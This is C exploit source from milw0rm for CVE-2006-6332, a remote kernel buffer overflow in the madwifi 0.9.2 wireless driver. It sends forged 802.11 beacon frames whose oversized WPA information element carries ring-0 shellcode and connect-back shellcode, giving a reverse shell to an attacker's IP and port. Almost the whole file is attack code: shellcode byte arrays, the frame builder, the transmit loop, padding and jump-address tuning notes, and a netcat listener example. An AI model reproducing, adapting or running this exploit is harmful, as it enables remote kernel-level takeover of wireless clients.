/* ---- madwifi WPA/RSN IE remote kernel buffer overflow ------
* expoit code by: sgrakkyu <at> antifork.org -- 10/1/2007
*
* CVE: 2006-6332 (Laurent BUTTI, Jerome RAZNIEWSKI, Julien TINNES)
*
* (for wpa)
* ....
* memcpy(buf, se->se_wpa_ie, se->se_wpa_ie[1] + 2)
* ....
* ....
* the function re-uses args in the stack before returning so we
* can't trash them overwriting.
* Different compiled module [ex. different version of gcc] may require
* a different pad value.. (see -g option)
*
* ex:
* on one terminal runs: nc -l -p 31337
* phi:~/kexec/lorcon# gcc -g -o madwifi_exp madwifi_exp.c -lorcon
* phi:~/kexec/lorcon# wlanconfig ath1 create wlandev wifi0 wlanmode monitor
* phi:~/kexec/lorcon# ifconfig ath1 up
* phi:~/kexec/lorcon# ./madwifi_exp -i ath1 -d madwifing -a 10.0.0.1 -p 31337
* [opt-ip]: 10.0.0.1
* [opt-port]: 31337
* [opt-iface]: ath1
* [opt-driver]: madwifing
* [opt-jump]: 0xffffe777
* [pad]: 36
*
* [*][Low Avail Byte]: 103
* [*][High Avail Byte]: 47
* [*][u_code[] (high)size]: 91, [ring0_code[] (low)size]: 47
* [*][ patching jump ]: [eba7]
* [*][Payload space]: 192
* [*][beacon_frame-80211]=54
* [*][beacon_WPA_IE_lenght]: 198
*
* [printing frame - start]
* 80 00 00 00 ff ff ff ff ff ff cc cc cc cc cc cc
* cc cc cc cc cc cc 00 00 00 00 00 00 00 00 00 00
* 64 00 01 00 00 03 41 41 41 01 08 82 84 8b 96 0c
* 18 30 48 03 01 0b dd c6 00 50 f2 01 01 00 90 90
* 90 90 90 90 90 90 90 90 90 90 31 c0 89 c3 40 40
* ....
* ....
*
*
* Tuning option:
* - depending on gcc version/optimization we have to change the padding of vector
* payload, take a look to the following disassembly of the module wlan.o compiled
* with gcc-4.0 (kernel compiled for i586):
*
* 00015a49 <giwscan_cb>:
* 15a49: 55 push %ebp
* 15a4a: 57 push %edi
* 15a4b: 56 push %esi
* 15a4c: 53 push %ebx
* 15a4d: 81 ec c4 00 00 00 sub $0xbc,%esp <--16+188=[204]
* .........
* .........
* .........
* 15fc3: 8d 54 24 12 lea 0xa(%esp),%edx <-esp+[10]
* 15fc7: 89 d7 mov %edx,%edi
* ...
* ...
* 15fd5: f3 a5 rep movsl %ds:(%esi),%es:(%edi)
*
*
* this is not a rule, check gcc generated code to calculate correct pad value :
* [startbuf-ret] = (16 + 188 - 10) = 194 byte
* PAD = 194 - SHELLCODE_SPACE - IEWPAheader(code,len,oui) = 194 - 150 - 8 = 36
* ( -g 36 would be the choice in that case)
*
* NOTE: 1) the remote box must call the ioctl() SIOCGIWSCAN
* for ex. when the iface gets up or during iwlist iface scanning
* command
*
* 2) if you need more space for kernel mode code you can rely on
* struct ieee80211_scan_entry paramter of gwiscan_cb()
* function to access the real frame (a trivial joke)
*
* 3) i had no time to test this exploit on other boxes..:
* tested only on: Slackware 10 - madwifi 0.9.2
* Kubuntu - kernel 2.6.17 - madwifi 0.9.2
*
*
* TNX TNX TNX twiz <at> antifork.org
*/
#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <getopt.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <tx80211.h>
#include <tx80211_packet.h>
#include <linux/wireless.h>
#include <arpa/inet.h>
/* 2.6.17 VSYSCALL: for >= 2.6.18 without fixed-vsyscall entry use kernel hardcoded value */
#define VSYSCALL_JMP_ESP_OFFSET 0xffffe777
#define IE_ZERO 0x00000000
#define FIX_BYTE(base,offset,byte) *(((unsigned char*)base) + offset) = byte;
#define FIX_WORD(base,offset,word) *((unsigned short *)((unsigned char*)base + offset)) = word;
#define FIX_DWORD(base,offset,dword) *((unsigned int *)((unsigned char*)base + offset)) = dword;
/* shellcode max buffer */
/* 8 bytes used for lenght + oui */
#define SHELLCODE_SPACE 150
#define PAD_SPACE 36
#define PAYLOAD_SPACE (SHELLCODE_SPACE + pad_space + 4 + 2)
#define TOTAL_PACKET_LEN (sizeof(beacon_80211_wpa) -1 + PAYLOAD_SPACE)
/* exp option */
char *iface = NULL; /* needed */
char *driver = NULL; /* needed */
char *ip = NULL; /* needed */
short port = 0; /* needed */
unsigned int jmp_address = VSYSCALL_JMP_ESP_OFFSET;
unsigned int pad_space = PAD_SPACE;
/* ----------------------------------- */
#define SUB_OFFSET_PATCH 8
char ring0_code[]=
"\xe8\x00\x00\x00\x00" //call 8048359 <main+0x21>
"\x5e" //pop %esi
"\x81\xee\x88\x00\x00\x00" //sub $0x88,%esi /* PATCH */
"\x31\xc0" //xor %eax,%eax
"\xb0\x04" //mov $0x4,%al
"\x01\xc4" //add %eax,%esp
"\x83\x3c\x24\x73" //cmp $0x73,%esp
"\x75\xf8" //jne 8048364 <main+0x2c>
"\x83\x7c\x24\x0c\x7b" //cmpl $0x7b,0xc(%esp)
"\x75\xf1" //jne 8048364 <main+0x2c>
"\x29\xc4" //sub %eax,%esp
"\x8b\x7c\x24\x0c" //mov 0xc(%esp),%edi
"\x89\x3c\x24" //mov %edi,(%esp)
"\x31\xc9" //xor %ecx,%ecx
"\xb1\x5b" //mov $0x5b,%cl /* FIX */
"\xf3\xa4" //rep movsb %ds:(%esi),%es:(%edi)
"\xcf"; //iret
/* connect back */
#define IP_OFFSET 35
#define PORT_OFFSET 44
char u_code[] =
"\x31\xc0\x89\xc3\x40\x40\xcd\x80\x39\xc3\x74\x03\x31\xc0\x40\xcd\x80" /* fork */
"\x6a\x66\x58\x99\x6a\x01\x5b\x52\x53\x6a\x02\x89\xe1\xcd\x80\x5b\x5d"
"\xbe"
"\xf5\xff\xff\xfe" // ~ip
"\xf7\xd6\x56\x66\xbd"
"\x69\x7a" // port
"\x0f\xcd\x09\xdd\x55\x43\x6a\x10\x51\x50\xb0\x66\x89\xe1\xcd\x80\x87\xd9"
"\x5b\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x52\x68\x2f\x2f\x73\x68"
"\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\xeb\xdf";
/* 802.11header + WPA IE prolog */
#define WPA_LEN_OFFSET 55
#define CHANNEL 11
char beacon_80211_wpa[] =
"\x80" // management frame / subtype beacon
"\x00" // flags
"\x00\x00" // duration
"\xFF\xFF\xFF\xFF\xFF\xFF" // destination addr
"\xCC\xCC\xCC\xCC\xCC\xCC" // src address
"\xCC\xCC\xCC\xCC\xCC\xCC" // bbsid
"\x00\x00" // seq
"\x00\x00\x00\x00\x00\x00\x00\x00" // timestamp
"\x64\x00" // interval
"\x01\x00" // caps
"\x00\x03\x41\x41\x41" // ssid Information Element
"\x01\x08\x82\x84\x8b\x96\x0c\x18\x30\x48" // rates Information Element
"\x03\x01\x0B" // channel Information Element (11)
"\xdd\xc6" // WPA Information Element (priv ID + len) (0xc6 = 0xc0 + 6) /* PATCH */
"\x00\x50\xf2\x01\x01\x00"; // oui + type + version (first 6 byte of len)
#define JUMP_OFFSET_PATCH 1
char jmp_back[]="\xeb\x00";
/* ----------------------------------- */
void usage(char *prog)
{
printf("[usage]: %s (-i iface) (-d drivername) (-a ip) (-p port) [-g pad] [-j jump_address]\n", prog);
}
unsigned char *build_frame()
{
int i,j;
char *frame = malloc(TOTAL_PACKET_LEN);
char *ptr = frame;
unsigned int hsb = sizeof(ring0_code)-1;
unsigned int lsb = SHELLCODE_SPACE - hsb;
printf("[*][low-kcode]: %d\n[*][high-ucode]: %d\n",
lsb, hsb);
printf("[*][u_code[] (high)size]: %d, [ring0_code[] (low)size]: %d\n",
sizeof(u_code)-1, sizeof(ring0_code)-1);
/* fix jump */
int b = -4 - pad_space - (sizeof(jmp_back)-1) - (sizeof(ring0_code)-1);
FIX_BYTE(jmp_back, JUMP_OFFSET_PATCH, b);
/* fix ring0_code/u_code displacement */
unsigned int sub = 5 + (sizeof(u_code)-1);
FIX_BYTE(ring0_code, SUB_OFFSET_PATCH, sub);
printf("[*][payload space]: %d\n", PAYLOAD_SPACE);
/* fix beacon_80211_wpa: WPA len */
FIX_BYTE(beacon_80211_wpa, WPA_LEN_OFFSET, PAYLOAD_SPACE + 6);
printf("[*][beacon_WPA_IE_lenght]: %u\n",
(unsigned char)beacon_80211_wpa[WPA_LEN_OFFSET]);
/* fill frame */
memset(frame, 0x00, TOTAL_PACKET_LEN);
memcpy(ptr, beacon_80211_wpa, sizeof(beacon_80211_wpa)-1);
ptr += (sizeof(beacon_80211_wpa)-1);
memset(ptr, 0x90, lsb - (sizeof(u_code)-1));
ptr += (lsb - (sizeof(u_code)-1));
memcpy(ptr, u_code, sizeof(u_code) -1);
ptr += (sizeof(u_code) -1);
memcpy(ptr, ring0_code, sizeof(ring0_code)-1);
ptr += sizeof(ring0_code)-1;
for(i=0; i<pad_space; i+=4)
*((unsigned int *)(ptr + i)) = (IE_ZERO+(i/4));
ptr += pad_space;
*((unsigned int *)(ptr)) = jmp_address;
ptr += 4;
memcpy(ptr, jmp_back, sizeof(jmp_back)-1);
ptr += sizeof(jmp_back)-1;
return (unsigned char*)frame;
}
void print_frame(unsigned char *frame, unsigned int size)
{
int i;
printf("\n[printing frame - start]\n ");
for(i=1; i<=size; i++)
{
printf("%02x ", frame[i-1]);
if((i % 16) == 0)
printf("\n ");
}
printf("\n[printing frame - end]\n");
}
void parse_arg(int argc, char **argv)
{
int opt;
struct in_addr in;
while( (opt=getopt(argc, argv, "j:i:a:p:d:g:")) != EOF)
{
switch(opt)
{
case 'j':
jmp_address = strtoll(optarg, NULL, 16);
break;
case 'a':
ip = strdup(optarg);
inet_aton(ip, &in);
FIX_DWORD(u_code, IP_OFFSET, ~(in.s_addr));
break;
case 'p':
port = atoi(optarg);
FIX_WORD(u_code, PORT_OFFSET, port);
break;
case 'd':
driver = strdup(optarg);
break;
case 'i':
iface = strdup(optarg);
break;
case 'g':
pad_space = atoi(optarg);
break;
default:
usage(argv[0]);
exit(1);
}
}
}
int main(int argc, char *argv[])
{
int i=0;
struct tx80211 in_tx;
struct tx80211_packet in_packet;
int drivertype;
parse_arg(argc, argv);
if(!iface || !driver || !ip || !port)
{
usage(argv[0]);
exit(1);
}
printf( "\n\nMadwifi 0.9.2 WPA/RSN IE buffer overflow\n\t exploit code: sgrakkyu <at> antifork.org\n"
"-------------------- **** ------------------\n"
"[opt-ip]: %s\n[opt-port]: %d\n[opt-iface]: %s\n[opt-driver]: %s\n[opt-jump]: 0x%08x\n[pad]: %d\n"
"-------------------- **** ------------------\n\n",
ip, port, iface, driver, jmp_address, pad_space);
unsigned char *frame = build_frame();
print_frame(frame, TOTAL_PACKET_LEN);
/* Use the command-line argument as the desired driver type */
drivertype = tx80211_resolvecard(driver);
/* Validate the driver name specified */
if (drivertype == INJ_NODRIVER)
{
fprintf(stderr, "Driver name not recognized.\n");
return -1;
}
if (tx80211_init(&in_tx, iface, drivertype) < 0) {
fprintf(stderr, "Error initializing drive \"%s\".\n", argv[1]);
return -1;
}
if ((tx80211_getcapabilities(&in_tx) & TX80211_CAP_CTRL) == 0)
{
fprintf(stderr, "Driver does not support transmitting control frames.\n");
return -1;
}
if (tx80211_setchannel(&in_tx, CHANNEL) < 0)
{
fprintf(stderr, "Error setting channel.\n");
return 1;
}
if (tx80211_open(&in_tx) < 0)
{
fprintf(stderr, "Unable to open interface %s.\n", in_tx.ifname);
return 1;
}
/* Initialized in_packet with packet contents and length of the packet */
in_packet.packet = frame;
in_packet.plen = TOTAL_PACKET_LEN;
printf("[sending packets]: about 10 a second\n");
while(i < 10000)
{
/* Transmit the packet */
if (tx80211_txpacket(&in_tx, &in_packet) < 0)
{
fprintf(stderr, "Unable to transmit packet.\n");
perror("txpacket");
return 1;
}
i++;
usleep(100000);
}
/* Close the socket after transmitting the packet */
tx80211_close(&in_tx);
return 0;
}
// milw0rm.com [2007-03-01]
